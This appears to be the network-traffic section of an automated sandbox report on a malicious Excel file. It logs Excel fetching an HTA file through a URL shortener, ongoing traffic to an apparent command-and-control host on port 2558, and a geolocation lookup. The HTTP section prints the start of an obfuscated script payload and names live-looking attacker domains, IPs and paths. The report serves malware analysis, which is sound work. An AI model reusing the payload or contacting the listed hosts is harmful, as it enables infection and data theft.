                Jul 26, 2024 09:30:09.890156031 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890156984 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890156031 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890173912 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890187979 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890202045 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890214920 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890218973 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890228987 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890239954 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890264034 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890265942 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890292883 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890305042 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890307903 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890321016 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890325069 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890346050 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890346050 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890376091 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890566111 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890636921 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890686035 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890700102 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890701056 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890726089 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890752077 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890850067 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890866995 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890908957 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890923977 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890924931 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890938997 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890953064 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890954018 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890968084 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.890978098 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890978098 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.890984058 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.891004086 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.891004086 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.891022921 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.891024113 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.891041040 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.891068935 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.891093016 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.891113043 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.968835115 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.968863010 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.968869925 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.968879938 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.968889952 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.968899965 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.968915939 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.968921900 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.968933105 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.968940020 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.968941927 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.968943119 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.969022036 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.969022036 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.969022036 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.969075918 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.969086885 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.969091892 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.969096899 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.969103098 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:09.969129086 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.969161034 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:09.969295979 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:12.947417021 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:12.947848082 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:15.611355066 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:15.616347075 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:15.616441011 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:15.623703003 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:15.629210949 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:16.238152981 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:16.370641947 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:16.371973991 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:16.376142025 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:16.382420063 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:16.382503986 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:16.387793064 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:17.855616093 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:17.860462904 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:17.865529060 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:17.973365068 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:18.171022892 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:18.321309090 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:19.586760998 CEST4916980192.168.2.22178.237.33.50
                Jul 26, 2024 09:30:19.591726065 CEST8049169178.237.33.50192.168.2.22
                Jul 26, 2024 09:30:19.591825008 CEST4916980192.168.2.22178.237.33.50
                Jul 26, 2024 09:30:19.592058897 CEST4916980192.168.2.22178.237.33.50
                Jul 26, 2024 09:30:19.596810102 CEST8049169178.237.33.50192.168.2.22
                Jul 26, 2024 09:30:19.708141088 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:19.713181973 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:20.216634989 CEST8049169178.237.33.50192.168.2.22
                Jul 26, 2024 09:30:20.216814995 CEST4916980192.168.2.22178.237.33.50
                Jul 26, 2024 09:30:20.245897055 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:20.250957012 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:21.398716927 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:21.399005890 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:21.399399996 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:21.399455070 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:21.400157928 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:21.400223970 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:21.400590897 CEST8049169178.237.33.50192.168.2.22
                Jul 26, 2024 09:30:21.400612116 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:21.400649071 CEST4916980192.168.2.22178.237.33.50
                Jul 26, 2024 09:30:21.400662899 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:22.277580023 CEST4917080192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:22.277826071 CEST4917180192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:22.282588005 CEST804917091.92.245.100192.168.2.22
                Jul 26, 2024 09:30:22.282737017 CEST4917080192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:22.282937050 CEST8049171188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:22.282982111 CEST4917180192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:22.283673048 CEST4917280192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:22.288824081 CEST8049172188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:22.288950920 CEST4917280192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:22.289392948 CEST4917280192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:22.294286966 CEST8049172188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:23.426986933 CEST8049172188.114.96.3192.168.2.22
                Jul 26, 2024 09:30:23.427313089 CEST4917280192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:27.001221895 CEST4917180192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:27.001384020 CEST4917280192.168.2.22188.114.96.3
                Jul 26, 2024 09:30:27.001384974 CEST4917080192.168.2.2291.92.245.100
                Jul 26, 2024 09:30:44.014791012 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:30:44.016875982 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:30:44.022250891 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:31:14.025507927 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:31:14.028703928 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:31:14.033727884 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:31:20.683614969 CEST4916980192.168.2.22178.237.33.50
                Jul 26, 2024 09:31:20.688817978 CEST8049169178.237.33.50192.168.2.22
                Jul 26, 2024 09:31:44.033164024 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:31:44.035036087 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:31:44.039824963 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:31:54.095776081 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:31:54.105976105 CEST8049163188.114.96.3192.168.2.22
                Jul 26, 2024 09:31:54.106057882 CEST4916380192.168.2.22188.114.96.3
                Jul 26, 2024 09:32:14.150502920 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:32:14.151973963 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:32:14.157037020 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:32:44.286369085 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:32:44.287563086 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:32:44.292443037 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:33:14.380295038 CEST25584916823.95.60.82192.168.2.22
                Jul 26, 2024 09:33:14.384188890 CEST491682558192.168.2.2223.95.60.82
                Jul 26, 2024 09:33:14.389141083 CEST25584916823.95.60.82192.168.2.22

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 26, 2024 09:29:55.009728909 CEST5456253192.168.2.228.8.8.8
                Jul 26, 2024 09:29:55.021058083 CEST53545628.8.8.8192.168.2.22
                Jul 26, 2024 09:29:57.706703901 CEST5291753192.168.2.228.8.8.8
                Jul 26, 2024 09:29:57.717645884 CEST53529178.8.8.8192.168.2.22
                Jul 26, 2024 09:30:15.432204008 CEST6275153192.168.2.228.8.8.8
                Jul 26, 2024 09:30:15.595709085 CEST53627518.8.8.8192.168.2.22
                Jul 26, 2024 09:30:18.982187033 CEST5789353192.168.2.228.8.8.8
                Jul 26, 2024 09:30:19.453432083 CEST53578938.8.8.8192.168.2.22
                Jul 26, 2024 09:30:19.455171108 CEST5789353192.168.2.228.8.8.8
                Jul 26, 2024 09:30:19.462793112 CEST53578938.8.8.8192.168.2.22
                Jul 26, 2024 09:30:22.268345118 CEST5482153192.168.2.228.8.8.8
                Jul 26, 2024 09:30:22.275839090 CEST53548218.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 26, 2024 09:29:55.009728909 CEST192.168.2.228.8.8.80xa9a0Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                Jul 26, 2024 09:29:57.706703901 CEST192.168.2.228.8.8.80x8c0eStandard query (0)tny.wtfA (IP address)IN (0x0001)false
                Jul 26, 2024 09:30:15.432204008 CEST192.168.2.228.8.8.80xa9e2Standard query (0)unifrieghtmovers.comA (IP address)IN (0x0001)false
                Jul 26, 2024 09:30:18.982187033 CEST192.168.2.228.8.8.80x9556Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                Jul 26, 2024 09:30:19.455171108 CEST192.168.2.228.8.8.80x9556Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                Jul 26, 2024 09:30:22.268345118 CEST192.168.2.228.8.8.80x66c5Standard query (0)tny.wtfA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 26, 2024 09:29:55.021058083 CEST8.8.8.8192.168.2.220xa9a0No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 09:29:55.021058083 CEST8.8.8.8192.168.2.220xa9a0No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 09:29:57.717645884 CEST8.8.8.8192.168.2.220x8c0eNo error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 09:29:57.717645884 CEST8.8.8.8192.168.2.220x8c0eNo error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                Jul 26, 2024 09:30:15.595709085 CEST8.8.8.8192.168.2.220xa9e2No error (0)unifrieghtmovers.com23.95.60.82A (IP address)IN (0x0001)false
                Jul 26, 2024 09:30:19.453432083 CEST8.8.8.8192.168.2.220x9556No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                Jul 26, 2024 09:30:19.462793112 CEST8.8.8.8192.168.2.220x9556No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                Jul 26, 2024 09:30:22.275839090 CEST8.8.8.8192.168.2.220x66c5No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                Jul 26, 2024 09:30:22.275839090 CEST8.8.8.8192.168.2.220x66c5No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • tny.wtf
                • 91.92.245.100
                • 107.173.143.46
                • geoplugin.net

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.2249163188.114.96.3802932C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampBytes transferredDirectionData
                Jul 26, 2024 09:29:55.033576965 CEST320OUTGET /jjJsPX HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: tny.wtf
                Connection: Keep-Alive
                Jul 26, 2024 09:29:56.272893906 CEST616INHTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:29:56 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bg7cszHjDgHRB7KM09KMrNRM0pRG%2F7N3NZvkBibTw9cV7WTKbi%2Fp8kjBBO1o80Of6cz9G95iD9rEyg85EzxSAd8C%2Fiw3VtL%2BYPCCwhqlhr5p4XNPq%2F397dXL"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92ae71a8c38c60-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 09:30:19.708141088 CEST320OUTGET /jjJsPX HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: tny.wtf
                Connection: Keep-Alive
                Jul 26, 2024 09:30:21.398716927 CEST614INHTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:30:20 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuuErqwVX6V4c3bfte75Twfij9%2F8VWE4arrPWm%2B1ii9QP1sJ7ai67%2BGfLZjMqxQBduPf1SbGu03PcYha8DG1wmiMDhWb2ysWhyEEfxrYQbt%2FLd9YVbnaobeQ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92af0978f98c60-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 09:30:21.399399996 CEST614INHTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:30:20 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuuErqwVX6V4c3bfte75Twfij9%2F8VWE4arrPWm%2B1ii9QP1sJ7ai67%2BGfLZjMqxQBduPf1SbGu03PcYha8DG1wmiMDhWb2ysWhyEEfxrYQbt%2FLd9YVbnaobeQ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92af0978f98c60-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 09:30:21.400157928 CEST614INHTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:30:20 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuuErqwVX6V4c3bfte75Twfij9%2F8VWE4arrPWm%2B1ii9QP1sJ7ai67%2BGfLZjMqxQBduPf1SbGu03PcYha8DG1wmiMDhWb2ysWhyEEfxrYQbt%2FLd9YVbnaobeQ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92af0978f98c60-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0
                Jul 26, 2024 09:30:21.400612116 CEST614INHTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:30:20 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuuErqwVX6V4c3bfte75Twfij9%2F8VWE4arrPWm%2B1ii9QP1sJ7ai67%2BGfLZjMqxQBduPf1SbGu03PcYha8DG1wmiMDhWb2ysWhyEEfxrYQbt%2FLd9YVbnaobeQ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92af0978f98c60-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.224916491.92.245.100802932C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampBytes transferredDirectionData
                Jul 26, 2024 09:29:56.293190002 CEST343OUTGET /xampp/ebcd/eb/gdfvr.hta HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 91.92.245.100
                Connection: Keep-Alive
                Jul 26, 2024 09:29:57.196281910 CEST1236INHTTP/1.1 200 OK
                Date: Fri, 26 Jul 2024 07:29:56 GMT
                Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                Last-Modified: Thu, 25 Jul 2024 16:26:06 GMT
                ETag: "25ddd-61e14da080a28"
                Accept-Ranges: bytes
                Content-Length: 155101
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/hta
                Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 36 43 25 36 31 25 36 45 25 36 37 25 37 35 25 36 31 25 36 37 25 36 35 25 33 44 25 34 41 25 36 31 25 37 36 25 36 31 25 35 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 33 45 25 36 44 25 33 44 25 32 37 25 32 35 25 33 33 25 34 33 25 32 35 25 33 32 25 33 31 25 34 34 25 34 46 25 34 33 25 35 34 25 35 39 25 35 30 25 34 35 25 32 35 25 33 32 25 33 30 25 36 38 25 37 34 25 36 44 25 36 43 25 32 35 25 33 33 25 34 35 25 32 35 25 33 30 25 34 31 25 32 35 25 33 33 25 34 33 25 36 44 25 36 35 25 37 34 25 36 31 25 32 35 25 33 32 25 33 30 25 36 38 25 37 34 25 37 34 25 37 30 25 32 44 25 36 35 25 37 31 25 37 35 25 36 39 25 37 36 25 32 35 25 33 33 25 34 34 25 32 35 25 33 32 25 33 32 25 35 38 25 32 44 25 35 35 25 34 31 25 32 44 25 34 33 25 36 46 25 36 44 25 37 [TRUNCATED]
                Data Ascii: <Script Language='Javascript'>...document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%4A%61%76%61%53%63%72%69%70%74%3E%6D%3D%27%25%33%43%25%32%31%44%4F%43%54%59%50%45%25%32%30%68%74%6D%6C%25%33%45%25%30%41%25%33%43%6D%65%74%61%25%32%30%68%74%74%70%2D%65%71%75%69%76%25%33%44%25%32%32%58%2D%55%41%2D%43%6F%6D%70%61%74%69%62%6C%65%25%32%32%25%32%30%63%6F%6E%74%65%6E%74%25%33%44%25%32%32%49%45%25%33%44%45%6D%75%6C%61%74%65%49%45%38%25%32%32%25%32%30%25%33%45%25%30%41%25%33%43%68%74%6D%6C%25%33%45%25%30%41%25%33%43%62%6F%64%79%25%33%45%25%30%41%25%33%43%53%63%72%49%70%74%25%32%30%54%59%50%65%25%33%44%25%32%32%74%45%58%54%2F%76%42%73%63%52%69%50%74%25%32%32%25%33%45%25%30%41%64%49%4D%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25
                Jul 26, 2024 09:29:57.196291924 CEST1236INData Raw: 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25
                Data Ascii: %32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25
                Jul 26, 2024 09:29:57.196296930 CEST1236INData Raw: 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25
                Data Ascii: %30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32
                Jul 26, 2024 09:29:57.196369886 CEST1236INData Raw: 25 35 41 25 36 36 25 36 44 25 35 31 25 35 34 25 37 33 25 36 38 25 37 37 25 36 46 25 34 38 25 36 33 25 34 43 25 34 39 25 35 37 25 36 35 25 36 35 25 37 37 25 37 30 25 36 42 25 37 41 25 36 43 25 36 41 25 35 39 25 36 33 25 36 45 25 36 44 25 34 38 25
                Data Ascii: %5A%66%6D%51%54%73%68%77%6F%48%63%4C%49%57%65%65%77%70%6B%7A%6C%6A%59%63%6E%6D%48%4E%66%62%44%41%48%6E%46%75%6C%69%68%67%68%6A%63%58%74%4B%62%41%78%76%6C%6B%4F%42%62%4A%57%7A%68%46%41%53%58%4A%61%77%65%54%64%4C%6A%59%53%78%64%72%51%42%63%57%49
                Jul 26, 2024 09:29:57.196382999 CEST1236INData Raw: 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25
                Data Ascii: %32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25
                Jul 26, 2024 09:29:57.196400881 CEST1236INData Raw: 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25
                Data Ascii: %30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32
